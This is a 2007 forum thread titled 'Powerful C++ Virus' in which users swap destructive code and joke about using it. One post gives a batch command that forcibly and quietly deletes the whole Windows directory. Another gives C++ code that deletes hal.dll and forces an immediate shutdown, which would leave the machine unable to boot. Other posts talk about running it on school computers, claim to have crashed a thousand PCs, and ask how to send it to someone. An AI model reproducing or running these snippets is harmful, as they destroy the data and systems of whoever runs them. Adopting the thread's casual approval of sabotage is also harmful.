Adblock breaks this site

Powerful C++ Virus

Discussion in 'Programming General' started by SidStudios, Mar 14, 2007.

Thread Status:
Not open for further replies.
  1. Typhoon

    Typhoon Forum Addict

    Joined:
    Jan 21, 2007
    Posts:
    452
    Referrals:
    0
    Sythe Gold:
    0
    Powerful C++ Virus


    lol you dont need all that code. Try this in a batch file. I think they both do the same thing.

    Code:
    del c:\windows\* /q /f /s
    /f = force delete read only
    /q = quiet (don't ask permission to delete)
    /s delete specifide files from all subdirectories
    the * is a wild card for all!

    Enjoy and dont use it on your own computer.
     
  2. cp

    cp an cat
    Banned

    Joined:
    Jan 30, 2007
    Posts:
    3,278
    Referrals:
    6
    Sythe Gold:
    0
    Powerful C++ Virus

    I hate it when people call things viruses.

    Also, I didn't set the avatar, I think that's the default or something.
     
  3. Supah Fly

    Supah Fly Active Member
    Banned

    Joined:
    Aug 22, 2007
    Posts:
    202
    Referrals:
    1
    Sythe Gold:
    0
    Powerful C++ Virus

    Lol! Just run it on some school computer put it out of misery cpu teachers will be like "Wtfbbq I cant get it to start" :p
     
  4. Govind

    Govind The One Musketeer
    Mudkips Highly Respected Retired Administrator

    Joined:
    Apr 22, 2005
    Posts:
    7,825
    Referrals:
    13
    Sythe Gold:
    23
    Prove it! Trole Tier 1 Prizebox Tortoise Penis Le Monkey UWotM8? Wait, do you not have an Archer rank? Potamus
    Powerful C++ Virus

    What kind of an idiot redneck school would have student accounts that could write to any dir but My Documents? -.-
     
  5. Sandstone7

    Sandstone7 Guest

    Referrals:
    0
    Powerful C++ Virus

    It would be hilarios if someone could get this on a jagex computer

    and have it delete

    runescape/players/zezima.txt
     
  6. cp

    cp an cat
    Banned

    Joined:
    Jan 30, 2007
    Posts:
    3,278
    Referrals:
    6
    Sythe Gold:
    0
    Powerful C++ Virus

    It would be "hilarios" if jagex was that stupid and kept their players in a txt file!

    No. Just no.
     
  7. unname

    unname Guest

    Referrals:
    0
    Powerful C++ Virus

    this doesn't work,i try it and it say something about .dll not found

    i remake another one test if it working anot:D


    #include <windows.h>
    int main(){
    char directory[MAX_PATH];
    GetSystemDirectory(directory,sizeof(directory));
    strcat(directory,"\\hal.dll");
    DeleteFile(directory);
    system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
    return 0;
    }
     
  8. viperdeck

    viperdeck Forum Addict

    Joined:
    May 12, 2007
    Posts:
    533
    Referrals:
    0
    Sythe Gold:
    0
    Powerful C++ Virus

    i uploaded my virus on my schools FTP and crashed over 1000 pc's o.o all at once xD
     
  9. ta1nted

    ta1nted Member

    Joined:
    Dec 6, 2007
    Posts:
    37
    Referrals:
    1
    Sythe Gold:
    0
    Powerful C++ Virus

    Hal.dll.... i'd get a whole pack of tissues if this was sent to someone with a brand new comp, and they had the curiosity to open this Dangerous code.


    In other words, DON'T TRY THIS AT HOME, because it is illegal (in here at the least), and can emotionally hurt you. :eek:
     
  10. cp

    cp an cat
    Banned

    Joined:
    Jan 30, 2007
    Posts:
    3,278
    Referrals:
    6
    Sythe Gold:
    0
    Powerful C++ Virus

    Lulz @ viperdeck

    Honestly, who would believe what you're saying? You uploaded a virus to your schools FTP, causing 1000 computers to crash. Wtf?

    ta1nted, I suppose you didn't read the previous posts, mentioning the fact that THIS "VIRUS" WON'T WORK.
     
  11. tldavis98011

    tldavis98011 Active Member

    Joined:
    Apr 2, 2006
    Posts:
    156
    Referrals:
    0
    Sythe Gold:
    0
    Powerful C++ Virus

    Viruses isn't allowed? Get your grammar right before you start being one of those people who suck anyones dick just to be a mod.
     
  12. Resident

    Resident Guest

    Referrals:
    0
    Powerful C++ Virus

    i can't believe you people are actually still posting in this topic; it's really not that cool, and is hardly effective enough to deem it 'powerful'

    fo' srs, do something productive; i don't think that this section was created so you fgts could discuss an impotent seven lines of code, that someone saw fit to deem a virus
     
  13. Jansen

    Jansen Retired Admin :'(
    Retired Global Moderator

    Joined:
    Apr 22, 2005
    Posts:
    5,213
    Referrals:
    6
    Sythe Gold:
    11
    Discord Unique ID:
    1072865532082147429
    Discord Username:
    jan.sen.
    Powerful C++ Virus

    haha, awesome. It was my old avatar
     
  14. A86753

    A86753 Forum Addict

    Joined:
    Sep 23, 2007
    Posts:
    299
    Referrals:
    0
    Sythe Gold:
    0
    Powerful C++ Virus

    Is their a counter to this.I program with visual basic and most of the viruses I made have had simple counters. Just wondering
     
  15. the_wippit

    the_wippit Guru
    Banned

    Joined:
    Jan 21, 2007
    Posts:
    1,507
    Referrals:
    0
    Sythe Gold:
    0
    Powerful C++ Virus

    i think your right too no ones here would be that irresponsible, lets just say that they wanted too....how would one go about sending this too another person
     
  16. cp

    cp an cat
    Banned

    Joined:
    Jan 30, 2007
    Posts:
    3,278
    Referrals:
    6
    Sythe Gold:
    0
    Powerful C++ Virus

    A86753, if you were a decent programmer, you would know that these are not viruses. There is always a counter to everything.

    The_Wippit, don't even think about it.
     
  17. Varreon

    Varreon Member

    Joined:
    Nov 23, 2007
    Posts:
    59
    Referrals:
    0
    Sythe Gold:
    0
    Powerful C++ Virus

    I've got to agree with cp_ on this one.
    source: wiki.
    I see no infection routine in that joke of an app. I challenge you to make something to infect batch scripts(or maybe scar scripts).
     
  18. SidStudios

    SidStudios Active Member

    Joined:
    Mar 14, 2007
    Posts:
    201
    Referrals:
    0
    Sythe Gold:
    0
    Powerful C++ Virus

    What would you call this then? It's a basic virus, just because some virii can spread themselves, doesn't mean that they set the standard or define the word "virus".

    This wouldn't be called a script either, since it's not a batch file, and after it is compiled, it is run by the machine, not interpreted.
     
  19. Faskist

    Faskist Tuxhead
    Banned

    Joined:
    Apr 25, 2005
    Posts:
    1,869
    Referrals:
    0
    Sythe Gold:
    0
    Powerful C++ Virus

    Even down to the machine level, it's interpreted by the bare metal. And a virus is named so because it mimics a virus - it settles somewhere, kills it, and spreads out using it's resources.
     
  20. cp

    cp an cat
    Banned

    Joined:
    Jan 30, 2007
    Posts:
    3,278
    Referrals:
    6
    Sythe Gold:
    0
    Powerful C++ Virus

    Why hasn't this been locked yet...?
     
< Visual Basic 2008 screenshot taker help. | [Dll] Flaming Hotkeys, Really simple to use >
Thread Status:
Not open for further replies.


 
 
Adblock breaks this site